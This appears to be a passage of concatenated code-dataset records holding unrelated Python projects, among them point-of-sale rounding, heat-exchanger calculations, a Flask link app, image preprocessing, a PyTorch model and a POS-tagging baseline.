factor) / factor\r\n elif company.wf_rounding_policy == 'up':\r\n rounded_amount = (math.ceil(taxes['total_included'] * factor)) / factor\r\n elif company.wf_rounding_policy == 'down':\r\n rounded_amount = math.floor(taxes['total_included'] * factor) / factor\r\n taxes = account_tax_obj.compute_all(cr, uid, line.product_id.taxes_id, rounded_amount, 1, product=line.product_id, partner=line.order_id.partner_id or False)\r\n \r\n cur = line.order_id.pricelist_id.currency_id\r\n res[line.id]['price_subtotal'] = cur_obj.round(cr, uid, cur, taxes['total'])\r\n res[line.id]['price_subtotal_incl'] = cur_obj.round(cr, uid, cur, taxes['total_included'])\r\n return res\r\n\r\n def onchange_qty(self, cr, uid, ids, product, discount, qty, price_unit, context=None):\r\n\r\n #bsbs 3 Zeilen dazu\r\n user = self.pool.get('res.users').browse(cr, uid, uid)\r\n company = user.company_id\r\n factor = int(100 / company.wf_rounding_pos)\r\n\r\n result = {}\r\n if not product:\r\n return result\r\n account_tax_obj = self.pool.get('account.tax')\r\n cur_obj = self.pool.get('res.currency')\r\n\r\n prod = self.pool.get('product.product').browse(cr, uid, product, context=context)\r\n\t #bsbs anfang\r\n taxes = prod.taxes_id\r\n price = price_unit * (1 - (discount or 0.0) / 100.0)\r\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, price, qty, product=prod, partner=False)\r\n\r\n if company.wf_rounding_policy == 'even':\r\n rounded_amount = round(taxes['total_included'] * factor) / factor\r\n elif company.wf_rounding_policy == 'up':\r\n rounded_amount = (math.ceil(taxes['total_included'] * factor)) / factor\r\n elif company.wf_rounding_policy == 'down':\r\n rounded_amount = math.floor(taxes['total_included'] * factor) / factor\r\n taxes = account_tax_obj.compute_all(cr, uid, prod.taxes_id, rounded_amount, 1, product=prod, partner=False)\r\n\t #bsbs ende\r\n\r\n result['price_subtotal'] = taxes['total']\r\n result['price_subtotal_incl'] = taxes['total_included']\r\n return {'value': result}\r\n\r\n\r\n _columns = {\r\n 'price_subtotal': fields.function(_amount_line_all, multi='pos_order_line_amount', string='Subtotal w/o Tax', store=True),\r\n 'price_subtotal_incl': fields.function(_amount_line_all, multi='pos_order_line_amount', string='Subtotal', store=True),\r\n }\r\n\r\npos_order_line()","sub_path":"wf_round_POS/wf_round.py","file_name":"wf_round.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"456851810","text":"from hwt.hdlObjects.types.hdlType import HdlType \nfrom hwt.hdlObjects.value import Value\nfrom hwt.hdlObjects.types.boolean import Boolean\nfrom hwt.hdlObjects.types.bits import Bits\nfrom hwt.hdlObjects.types.defs import INT\nfrom hwt.hdlObjects.operator import Operator\nfrom hwt.hdlObjects.operatorDefs import AllOps\nfrom hwt.bitmask import mask\n\ndef convertBits__val(self, sigOrVal, toType):\n if isinstance(toType, Boolean):\n return sigOrVal._eq(self.getValueCls().fromPy(1, self))\n elif isinstance(toType, Bits):\n if self.bit_length() == toType.bit_length():\n return sigOrVal._convSign(toType.signed)\n elif toType == INT:\n if self.signed:\n raise NotImplementedError()\n else:\n fullMask = mask(self.bit_length())\n return INT.getValueCls()(sigOrVal.val, INT, sigOrVal.vldMask == fullMask, sigOrVal.updateTime)\n return HdlType.defaultConvert(self, sigOrVal, toType)\n\n\ndef convertBits(self, sigOrVal, toType):\n isVal = isinstance(sigOrVal, Value)\n \n if isinstance(toType, Boolean):\n if isVal:\n return sigOrVal._eq(self.getValueCls().fromPy(1, self))\n elif self.bit_length() == 1:\n v = 0 if sigOrVal.negated else 1\n return sigOrVal._eq(self.getValueCls().fromPy(v, self))\n elif isinstance(toType, Bits):\n if self.bit_length() == toType.bit_length():\n return sigOrVal._convSign(toType.signed)\n elif toType == INT:\n if isVal:\n if self.signed:\n raise NotImplementedError()\n else:\n fullMask = mask(self.bit_length())\n return INT.getValueCls()(sigOrVal.val, INT, sigOrVal.vldMask == fullMask, sigOrVal.updateTime)\n else:\n return Operator.withRes(AllOps.BitsToInt, [sigOrVal], toType)\n\n return HdlType.defaultConvert(self, sigOrVal, toType)\n","sub_path":"hwt/hdlObjects/types/bitsConversions.py","file_name":"bitsConversions.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"76072426","text":"#!/usr/bin/env python\n#\nimport grovepi\nimport math\n\n# Connexion du capteur humidite temperature sur le port D4\nsensor = 4\n\n# temp_humidity_sensor_type\n# Utilisation du capteur \"bleu\"\nblue = 0 \nwhite = 1\n\n\ntry:\n [temp,humidity] = grovepi.dht(sensor,blue) \n if math.isnan(temp) == False and math.isnan(humidity) == False:\n print(\"temperature = %.02f C hygrométrie =%.02f%%\"%(temp, humidity))\n\nexcept IOError:\n print (\"Error\")\n","sub_path":"raspberry/lecture_humidite_temperature.py","file_name":"lecture_humidite_temperature.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"649709678","text":"#File: rootsPeters.py \n#Project: CSIS2101 \n#Author: Joshua Peters \n#History: Version 1.0 September 25, 2020\n\n# This program's function is to find two roots of a quadratic equation.\n# Quadratic equation: ax^2 + bx + c = 0\n# Quadratic formula: (-b +/- sqrt(b^2 - 4ac)/2a\n\nimport math\n\ndef main():\n# assigns user input as variables\n a,b,c = eval(input(\"Type in the a, b, & c value for your equation \\\nseparated by commas: \"))\n\n# calls the calculation of the discriminate\n disc = calcDisc(a,b,c)\n\n# calculates and displays the roots or not\n if validateDisc(disc) == True:\n root1 = (-b + math.sqrt(disc)) / (2*a)\n root2 = (-b - math.sqrt(disc)) / (2*a)\n print(\"The roots of the equation:\", root1, root2)\n else:\n print(\"The square root of a negative number cannot be determinded.\")\n\n# calculates the discriminate\ndef calcDisc(a,b,c):\n disc = b**2 - 4*a*c\n return disc\n\n# makes sure the equation is solvable\ndef validateDisc(disc):\n if disc < 0:\n return False;\n else:\n return True;\n","sub_path":"rootsPeters.py","file_name":"rootsPeters.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"602505116","text":"# -*- coding: utf-8 -*-\r\n# Módulo de Equações para Trocadores de Calor Duplo-Tubo\r\n# Última alteração: 19:32 18/09/2016\r\n\r\nfrom math import *\r\nfrom dupl_tubo import *\r\n\r\nfluido1={'Vazao':0,'T_entr':0,'T_said':0,'cp':0,'k':0,'Pr':0,'Viscos':0,\r\n 'Densidade':0,'Diam_ext':0,'Diam_int':0,'Annulus':0,'Liquido':0,'Viscos_tw':0}\r\nfluido2={'Vazao':0,'T_entr':0,'T_said':0,'cp':0,'k':0,'Pr':0,'Viscos':0,\r\n 'Densidade':0,'Diam_ext':0,'Diam_int':0,'Annulus':1,'Liquido':0,'Viscos_tw':0}\r\nmaterial={'K':0,'L':1, 'R_fi':0,'R_fo':0,'Calor_cnste':0,'Contracorrente':0,\r\n 'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,\r\n 'Alet_type':0,'Tubo_aletado':0,'Multi_tube':0}\r\n\r\n########################### LEMBRAR DE: ############################################\r\n# 1º Corrigir Banco de Dados\r\n# 2º \r\n# 3º \r\n# 4º \r\n####################################################################################\r\n\r\n\r\ndef yut(fluido1,fluido2,material):\r\n if not all([fluido1['Vazao'],fluido2['Vazao'],fluido1['T_entr'],\r\n fluido1['T_said'],fluido2['T_entr'],fluido2['T_said']]):\r\n calor_vazao(fluido1,fluido2) # Add in the commments section!\r\n if material['arranj_ser_paral']==True:\r\n if material['T_I_Paralelo']:\r\n fluido1['Vazao']=fluido1['Vazao']/material['Num_ramos']\r\n elif material['R_A_Paralelo']:\r\n fluido2['Vazao']=fluido2['Vazao']/material['Num_ramos']\r\n reynolds_tube(fluido1,fluido2,material)\r\n nusselt_tube(fluido1,fluido2,material)\r\n nusselt_tube(fluido2,fluido1,material)\r\n dTm=check_dtm(fluido1,fluido2,material) \r\n h_i=fluido1['Nu']*fluido1['k']/fluido1['Diam_int']\r\n if material['Tubo_aletado']==True:\r\n d_h,h_o,U_d,U_c,A_tot=alets(fluido1,fluido2,material)\r\n else:\r\n # Annulus - UNfinned\r\n h_o=fluido2['Nu']*fluido2['k']/((fluido2['Diam_int']**2-fluido1['Diam_ext']**2)/fluido1['Diam_ext'])\r\n U_d=(fluido1['Diam_ext']/(fluido1['Diam_int']*h_i)+(fluido1['Diam_ext']*material['R_fi'])/fluido1['Diam_int']+(fluido1['Diam_ext']*log(fluido1['Diam_ext']/fluido1['Diam_int']))/(2*material['K'])+material['R_fo']+(1/h_o))**-1\r\n U_c=((fluido1['Diam_ext']/(fluido1['Diam_int']*h_i))+(fluido1['Diam_ext']*log(fluido1['Diam_ext']/fluido1['Diam_int'])/(2*material['K']))+(h_o**-1))**-1\r\n q=fluido1['Vazao']*fluido1['cp']*abs(fluido1['T_entr']-fluido1['T_said'])\r\n if material['arranj_ser_paral']==True:\r\n F_p=dupl_fact_ser_paral(material)\r\n area=q/(U_d*F_p*dTm)\r\n else:\r\n area=(q)/(U_d*dTm);\r\n area_grampo=A_tot if material['Tubo_aletado']==True else 2*pi*fluido1['Diam_ext']*material['L']\r\n if material['arranj_ser_paral']==True:\r\n x=int(area/area_grampo);n=material['Num_ramos'];\r\n num_grampo=(x//n)*n+n\r\n else:\r\n num_grampo=int(area/area_grampo) if area/area_grampo==int(area/area_grampo) else int(area/area_grampo)+1 \r\n material['Num_gramp']=num_grampo\r\n Pressure_drop_serth(fluido1,material)\r\n if material['Tubo_aletado']==True:\r\n Pressure_drop_serth(fluido2,material,diam_h=d_h)\r\n else: \r\n Pressure_drop_serth(fluido2,material,diam_h=fluido2['Diam_int']-fluido1['Diam_ext'])\r\n fluido1['Potencia_bomb']=fluido1['Vazao']*fluido1[u'\\u0394Ptotal']/(material['Efic_bomb1']*fluido1['Densidade'])\r\n fluido2['Potencia_bomb']=fluido2['Vazao']*fluido2[u'\\u0394Ptotal']/(material['Efic_bomb2']*fluido2['Densidade'])\r\n CF=U_d/U_c;OS=100*U_c*(1-CF)/(U_c*CF)\r\n result_fl={'Vazão':(str(fluido1['Vazao'])+' Kg/s',str(fluido2['Vazao'])+' Kg/s'),\r\n 'Temperatura de Entrada':(str(fluido1['T_entr'])+u' ºC',str(fluido2['T_entr'])+u' ºC'),\r\n 'Temperatura de Saída':(str(fluido1['T_said'])+u' ºC',str(fluido2['T_said'])+u' ºC'),\r\n 'Velocidade Média de Escoamento':(str(fluido1['Vel_m'])+u' m/s',str(fluido2['Vel_m'])+u' m/s'),\r\n 'Número de Reynolds':(str(fluido1['Re'])+u' ',str(fluido2['Re'])+u' '),\r\n 'Número de Nusselts':(str(fluido1['Nu'])+u' ',str(fluido2['Nu'])+u' '),\r\n 'Coeficiente de Película (h)':(str(h_i)+u' W/m2.K',str(h_o)+u' W/m2.K')};\r\n result_pres={u'\\u2206P':(str(fluido1[u'\\u0394P'])+u' Pa',str(fluido2[u'\\u0394P'])+u' Pa'),\r\n '\\u2206Prb':(str(material[u'\\u0394Pr1'])+u' Pa',str(material[u'\\u0394Pr2'])+u' Pa'),\r\n '\\u2206Ptotal':(str(fluido1[u'\\u0394Ptotal'])+u' Pa',str(fluido2[u'\\u0394Ptotal'])+u' Pa'),\r\n 'Potência de Bombeamento':(str(fluido1['Potencia_bomb'])+u' W',str(fluido2['Potencia_bomb'])+u' W'),\r\n '\\u2206Pnl (bocais)':(str('---')+u' Pa',str(material[u'\\u0394Pn'])+u' Pa')}\r\n result_geral={'Área de Troca Térmica Total':(str(area)+u' m2'),\r\n 'Calor Trocado (Heat Duty)':(str(q)+u' J'),\r\n 'Coef. de Trans. de Calor Limpo (Uc)':(str(U_c)+u' W/m2.K'),\r\n 'Coef. de Trans. de Calor Incrustado (Ud)':(str(U_d)+u' W/m2.K'),\r\n 'Fator de Limpeza (CF)':(str(CF)+u' '),\r\n 'Var. Log. de Temperatura (\\u2206Tm)':(str(dTm)+u' K'),\r\n 'Área por Grampo Tubular':(str(area_grampo)+' m2'),\r\n 'Número de Grampos':(str(num_grampo)+' grampo(s)'),\r\n 'Excesso de Área (Over-Surface Design)':(str(OS)+u'%')}\r\n return result_fl,result_pres,result_geral\r\n\r\n\r\n# Exemplo 6.1 Kakaç e Liu (2002)\r\n'''\r\nfluido1={'Vazao':0,'T_entr':140,'T_said':125,'cp':4268,'k':0.687,'Pr':1.28,'Viscos':0.207*10**-3,'Densidade':932.53,'Diam_ext':0.0603,'Diam_int':0.0525,'Annulus':0,'Liquido':1,'Viscos_tw':0.196*10**-3};fluido2={'Vazao':5000/3600.,'T_entr':20,'T_said':35,'cp':4179,'k':0.609,'Pr':5.77,'Viscos':0.841*10**-3,'Densidade':996.4,'Diam_ext':0,'Diam_int':0.0779,'Annulus':1,'Liquido':1,'Viscos_tw':0.719*10**-3};material={'K':54,'L':3.5, 'R_fi':0.000176,'R_fo':0.000352,'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n'''\r\n\r\n# Exemplo 6.3 STT Sample\r\n\"\"\"\r\nfluido1={'Pr':16.16959743921541,'Annulus':0,'T_entr':148.8889,'T_said':154.444,'cp':2473.926, 'Liquido':1,'Diam_int':0.052502,'Vazao':4.56741944,'Viscos':8.247780588*10**-4,'Diam_ext':0.060452,'k':0.1261899,'Densidade':758.8635647561536,'Viscos_tw':0};fluido2={'Pr':67.12089254763255,'Annulus':1,'T_entr':232.2222,'T_said':176.6667,'cp':2595.32, 'Liquido':1,'Diam_int':0.077927,'Vazao':0.869384666666,'Viscos':0.00299942964836582,'Diam_ext':0.0889,'k':0.115977,'Densidade':770.8837447469,'Viscos_tw':0};material={'K': 54, 'L': 6.096, 'Calor_cnste': 1, 'R_fi':0.0056869019274806264 , 'R_fo': 0.0056869019274806264, 'Contracorrente': 1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo 6.1 Kern\r\n\"\"\"\r\nfluido1={'Pr': 1735.2*(541.23*10**-6)/(140.1072*10**-3), 'Annulus': 0, 'T_entr': 26.6, 'T_said': 48.8, 'cp': 1735.2, 'Liquido': 1, 'Diam_int': 35.052*10**-3, 'Vazao': 1.2372, 'Viscos': 541.23*10**-6, 'Diam_ext': 42.164*10**-3, 'k': 140.1072*10**-3, 'Densidade': 860.111, 'Viscos_tw': 0};fluido2={'Pr':1768.3*(575.7156*10**-6)/(121.154*10**-3) , 'Annulus': 1, 'T_entr': 71.1, 'T_said': 37.8, 'cp': 1768.3, 'Liquido': 1, 'Diam_int': 52.5018*10**-3, 'Vazao': 0.0, 'Viscos': 575.7156*10**-6, 'Diam_ext': 60.452*10**-3, 'k': 121.154*10**-3, 'Densidade': 834.356, 'Viscos_tw': 0};material={'K': 54, 'L': 6.096, 'Calor_cnste': 1, 'R_fi':0.0002 , 'R_fo': 0.0002, 'Contracorrente': 1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo Serth 4.1 pg 116\r\n\"\"\"\r\nfluido1={'Vazao':1.26,'T_entr':15.5556,'T_said':48.889,'cp':1758.456,'k':0.1594452,'Pr':6.06572,'Viscos':0.55*10**-3,'Densidade':879.0,'Diam_ext':0.0603, 'Diam_int':0.0525,'Annulus':0, 'Liquido':1,'Viscos_tw':0.33*10**-3};fluido2={'Vazao':0,'T_entr':65.5556,'T_said':37.7778,'cp':2177.136,'k':0.1731,'Pr':25.15466,'Viscos':2*10**-3,'Densidade':1022.0,'Diam_ext':0,'Diam_int':0.0779,'Annulus':1,'Liquido':1,'Viscos_tw':1.55*10**-3};material={'K':16.2714,'L':4.8768, 'R_fi':0.000176,'R_fo':0.000352, 'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':0,'Alet_per_tube':0,'Alet_alt':0,'Alet_K':0,'Alet_espes':0,'Alet_type':0,'Tubos_Aletado':0}\r\n\"\"\"\r\n\r\n# Exemplo 6.2 Kakaç e Liu pg 206\r\n\"\"\"\r\nfluido1={'Vazao':0,'T_entr':20,'T_said':30,'cp':4004.0,'k':0.693,'Pr':6.29,'Viscos':9.64*10**-4,'Densidade':1013.4,'Diam_ext':0.0266,'Diam_int':0.02093,'Annulus':0,'Liquido':1,'Viscos_tw':9.64*10**-4};fluido2={'Vazao':3.0,'T_entr':65,'T_said':55,'cp':1902.0,'k':0.1442,'Pr':1050.0,'Viscos':0.075,'Densidade':885.27,'Diam_ext':0,'Diam_int':0.0525,'Annulus':1,'Liquido':1,'Viscos_tw':0.197};material={'K':52,'L':4.5, 'R_fi':0.000176,'R_fo':0.088*10**-3,'Calor_cnste':1,'Contracorrente':1,'Efic_bomb1':0.8,'Efic_bomb2':0.8,'Num_tubs':1,'Alet_per_tube':30,'Alet_alt':0.0127,'Alet_K':52,'Alet_espes':0.9*10**-3,'Alet_type':'retangular','Tubos_Aletado':1}\r\n\"\"\"\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"trocador/cascoetubos/metodo_kern.py","file_name":"metodo_kern.py","file_ext":"py","file_size_in_byte":9171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"349294728","text":"from flask import *\nfrom wtforms import Form\nfrom dbconnect import connection\nfrom MySQLdb import escape_string as esc\nimport gc\n\napp = Flask(__name__)\napp.secret_key = 'T\\xa0\\x96W\\x1cZ\\x02\\x81zZ\\xf0\\xbd\\xe1\"+\\x05\\x83\\x1fc\\xde]y>\\xe3'\n\n@app.route('/')\ndef main_page():\n c, conn = connection()\n c.execute(\"SELECT * FROM links\");\n links = c.fetchall()\n c.close()\n conn.close()\n gc.collect()\n return render_template(\"index.html\",links=links)\n\n@app.route('/submit_link', methods=['POST','GET'])\ndef submit_link():\n if request.method == 'POST':\n # database stuff\n c, conn = connection()\n title = request.form['title']\n newlink = request.form['newlink']\n c.execute(\"INSERT INTO links (title,link) VALUES (%s,%s)\",\n (esc(title),esc(newlink)) )\n conn.commit()\n flash(\"Link Submitted!\")\n c.close()\n conn.close()\n gc.collect()\n return redirect(url_for(\"main_page\"))\n else:\n return render_template(\"submit.html\")\n\n@app.route('/delete_link/')\ndef delete(id):\n c, conn = connection()\n c.execute(\"DELETE FROM links where id=%s\",(str(id),))\n conn.commit()\n flash(\"Deleted!\")\n c.close()\n conn.close()\n gc.collect()\n return redirect(url_for(\"main_page\"))\n\nif __name__ == '__main__':\n app.debug=True\n app.run()\n","sub_path":"FlaskApp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"153965623","text":"# Image Processing tools for processing the image files\n\nimport cv2\nimport numpy as np\n\ndef readGreyscaleImage(filename):\n \"\"\"Reads an image file as greyscale and returns it.\"\"\"\n\n return cv2.imread(filename, cv2.CV_LOAD_IMAGE_GRAYSCALE)\n\ndef writeGreyscaleImage(img, filename):\n \"\"\"Writes a greyscale image to a file.\"\"\"\n\n cv2.imwrite(filename, img)\n\ndef binarize(im_gray):\n \"\"\"Returns the binary form of a greyscale image.\"\"\"\n\n (thresh, im_bw) = cv2.threshold(im_gray, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)\n return im_bw\n\ndef resizeTo100x100(im):\n \"\"\"Resizes the image to 100x100 and returns the resulting image.\"\"\"\n \n return cv2.resize(im, (100, 100))\n\ndef convertToZeroTen(img):\n \"\"\"Returns a zero-ten form of the image with each pixel having a value either 0 or 10.\n\n An assigned value of 0 means that in the binarized image, that pixel was white.\n An assigned value of 10 means that in the binarized image, that pixel was black.\n\n \"\"\"\n\n img_bw = binarize(img)\n height, width = img.shape\n new_img = np.zeros((height, width), np.uint8)\n for i in range(height):\n for j in range(width):\n if img_bw[i, j] == 255:\n new_img[i, j] = 0\n else:\n new_img[i, j] = 10\n return new_img\n\ndef scale(img, factor):\n \"\"\"Scales the value of each pixel in a greyscale image by factor and returns the resulting image.\"\"\"\n\n height, width = img.shape\n new_img = np.zeros((height, width), np.uint8)\n for i in range(height):\n for j in range(width):\n new_img[i, j] = img[i, j] * factor\n return new_img\n\ndef createGradientHelper(img_zt, i, j, factor):\n \"\"\"Helper function for createGradient().\"\"\"\n\n height, width = img_zt.shape\n new_factor = factor - 1\n if new_factor > 0:\n if i != 0:\n if img_zt[i - 1, j] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j, new_factor)\n if j != 0 and img_zt[i - 1, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j - 1, new_factor)\n if j != (width - 1) and img_zt[i - 1, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i - 1, j + 1, new_factor)\n if i != (height - 1):\n if img_zt[i + 1, j] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j, new_factor)\n if j != 0 and img_zt[i + 1, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j - 1, new_factor)\n if j != (width - 1) and img_zt[i + 1, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i + 1, j + 1, new_factor)\n if j!= 0 and img_zt[i, j - 1] != 10:\n img_zt = createGradientHelper(img_zt, i, j - 1, new_factor)\n if j != (width - 1) and img_zt[i, j + 1] != 10:\n img_zt = createGradientHelper(img_zt, i, j + 1, new_factor)\n val = 2 * factor\n if img_zt[i, j] < val:\n img_zt[i, j] = val\n return img_zt\n\ndef createGradient(img_zt):\n \"\"\"Creates a gradient over a zero-ten image and returns it.\"\"\"\n\n height, width = img_zt.shape\n new_img = np.zeros((height, width), np.uint8)\n for i in range(height):\n for j in range(width):\n new_img[i, j] = img_zt[i, j]\n for i in range(height):\n for j in range(width):\n if new_img[i, j] == 10:\n new_img = createGradientHelper(new_img, i, j, 5)\n return new_img\n\ndef getBoundingBox(image):\n \"\"\"Returns limits of the region of interest.\"\"\"\n\n img = binarize(image)\n height, width = img.shape\n topLimit = -1\n bottomLimit = -1\n leftLimit = width + 1\n rightLimit = -1\n for i in range(height):\n for j in range(width):\n if img[i, j] == 0:\n if topLimit == -1:\n topLimit = i\n if bottomLimit < i:\n bottomLimit = i\n if rightLimit < j:\n rightLimit = j\n if leftLimit > j:\n leftLimit = j\n return leftLimit, rightLimit, topLimit, bottomLimit\n\ndef autoCrop(img):\n \"\"\"Autocrops the image and returns it.\"\"\"\n\n left, right, top, bottom = getBoundingBox(img)\n return resizeTo100x100(img[top:bottom, left:right])","sub_path":"components/ip_tools.py","file_name":"ip_tools.py","file_ext":"py","file_size_in_byte":4269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"279225946","text":"# -*- coding: utf-8 -*-\nfrom default_settings import *\n\nimport os\npath = os.path.abspath(os.path.dirname(__file__))\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nINTERNAL_IPS = ('127.0.0.1',)\n\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(path, '../../db.sqlite'),\n }\n}\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nDEFAULT_FROM_EMAIL = 'angelo@ma-work.co.uk'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = u'1234'\n\n\n#INSTALLED_APPS = INSTALLED_APPS + (\n# 'debug_toolbar',\n#)\n","sub_path":"src/website/local_settings.development.py","file_name":"local_settings.development.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"464465865","text":"import os\n\ntest_env = Environment(CCFLAGS = \"-std=c++11 -D_WEBSOCKETPP_CPP11_STL_ -g\", LINKFLAGS = \"-pthread\", CPPPATH = \"../../src\", LIBPATH = \"../../build\")\n\n# Load environment variables\ntest_env.Replace(**os.environ)\n\nImport(\"lib_log\")\nImport(\"lib_tasks\")\nImport(\"lib_events\")\nImport(\"lib_data\")\n\n# Source section\nsources = Split(\"\"\"\nmain.cpp\nlog/log_tests.cpp\n\"\"\")\n\nTEST_COMMAND = \"$SOURCE | tee $TARGET\"\n\n# Target section\ntests = test_env.Program(\"dawntest\",\n source = sources,\n LIBS = [\n 'dawn-log',\n 'dawn-data',\n 'dawn-events',\n 'dawn-tasks',\n 'gtest'])\nrun_tests = Command(target = \"tests.log\",\n source = tests,\n action = TEST_COMMAND)\n\n# Aliases\ntest_env.Alias(\"tests\", tests)\ntest_env.Alias(\"run-tests\", run_tests)\n\n","sub_path":"tests/src/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"91608709","text":"import torch.nn as nn\n\n\nclass Project(nn.Module):\n def __init__(self):\n super(Project, self).__init__()\n self.conv = nn.Conv1d(1, 2, 3, padding=1)\n self.pool = nn.MaxPool1d(2)\n self.relu = nn.ReLU()\n self.conv1 = nn.Conv1d(2, 4, 2, padding=1)\n self.linear1 = nn.Linear(3 * 4, 8)\n self.linear2 = nn.Linear(8, 4)\n self.linear3 = nn.Linear(4, 2)\n\n def forward(self, input):\n\n x = self.conv(input.view(len(input), 1, 10))\n x = self.pool(x)\n x = self.conv1(x)\n x = self.pool(x)\n x = x.view(-1, 3 * 4)\n x = self.relu(self.linear3(self.relu(self.linear2(self.relu(self.linear1(x))))))\n return x\n","sub_path":"Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"137133105","text":"from dataset_preprocessing import preprocessing_pipeline\nimport time\nimport psutil\nimport os\n\ndef get_process_memory():\n process = psutil.Process(os.getpid())\n return process.memory_info().rss\n\ndef track(func):\n def wrapper(*args, **kwargs):\n mem_before = get_process_memory()/1024/1024\n start = time.time()\n result = func(*args, **kwargs)\n elapsed_time = time.time() - start\n mem_after = get_process_memory()/1024/1024\n print(\"{}: memory before: {:,} MB, after: {:,} MB, consumed: {:,} MB; exec time: {}\".format(\n func.__name__,\n mem_before, mem_after, (mem_after - mem_before),\n elapsed_time))\n return result\n return wrapper\n\n@track\ndef pipeline():\n preprocessing_pipeline()\n\nif __name__ == '__main__':\n pipeline() \n ","sub_path":"Project 2/src/paradise/ETL/paradise_pipeline.py","file_name":"paradise_pipeline.py","file_ext":"py","file_size_in_byte":822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"437656116","text":"#!/usr/bin/env python3\nimport re\nfrom collections import Counter\n\nfrom sklearn.metrics import accuracy_score\n\n\nDEV_DATA = \"lassysmall/nl_lassysmall-ud-dev.conllu\"\nTEST_DATA = \"lassysmall/nl_lassysmall-ud-test.conllu\"\nTRAIN_DATA = \"lassysmall/nl_lassysmall-ud-train.conllu\"\n\nTAG_INDEX = 3\nWORD_INDEX = 1\n\n\ndef main():\n \"\"\"\n Implement a baseline system for your corpus that assigns each word its most frequent PoS tag.\n Empty lines and lines starting with a # can be ignored. Also lines starting with a code that\n is not an integer (i.e. 13.1 or 13-14) can be ignored. Data is tab-separated.\n The second column is the word, the fourth column the POS-tag. All other columns can be ignored.\n Collect statistics for the most frequent PoS per word from the *-train.conllu file and compute\n the performance of the baseline method on the *-dev.conllu. Dealing with unknown words requires\n special attention. Report your accuracy for the 2 versions of the baseline: one that has the\n simplemest strategy for handling unknowns and scores for an improved version as suggested in the book.\n\n Returns\n -------\n\n \"\"\"\n with open(TRAIN_DATA, 'r', encoding='utf-8') as F:\n corpus = F.readlines()\n\n with open(DEV_DATA, 'r', encoding='utf-8') as F:\n dev_corpus = F.readlines()\n\n training_data = extract(corpus)\n dev_data = extract(dev_corpus)\n model = train(training_data)\n\n tag_counts = count_tags(training_data)\n # print({k: v for k, v in sorted(tag_counts.items(), key=lambda item: item[1])})\n\n # exit()\n\n target_values, predictions = [], []\n for word, target in dev_data:\n target_values.append(target)\n try:\n predictions.append(model[word])\n except KeyError:\n predictions.append('NOUN')\n\n print(accuracy_score(target_values, predictions))\n\n\ndef extract(corpus):\n \"\"\"Load information from .conllu files.\n\n Parameters\n ----------\n corpus : iterable\n Collection of strings.\n\n Returns\n -------\n mappings : iterable\n Word-tag pairs in an iterable.\n \"\"\"\n mappings = []\n for line in corpus:\n if re.match(r\"^(#)|^([0-9]\\.)\", line) or not line.strip():\n continue\n else:\n row = line.split('\\t')[:4]\n word, tag = row[WORD_INDEX], row[TAG_INDEX]\n mappings.append((word, tag)) # add pair to mappings\n return mappings\n\n\ndef train(training_data):\n \"\"\"Trains the model on a given data set.\n\n Parameters\n ----------\n training_data\n\n Returns\n -------\n\n \"\"\"\n counts = Counter(training_data)\n model = {}\n # sort counts by lowest occurrences, up to most frequent.\n # this allows higher frequencies to overwrite related\n # values in the model\n for pair, _ in counts.most_common()[:-len(counts)-1:-1]:\n word, tag = pair\n model[word] = tag\n\n return model\n\n\ndef count_tags(data):\n \"\"\"Count tags from the data.\n\n Parameters\n ----------\n data : iterable\n List containing tuples, which consist of a word and a POS tag.\n Returns\n -------\n\n \"\"\"\n 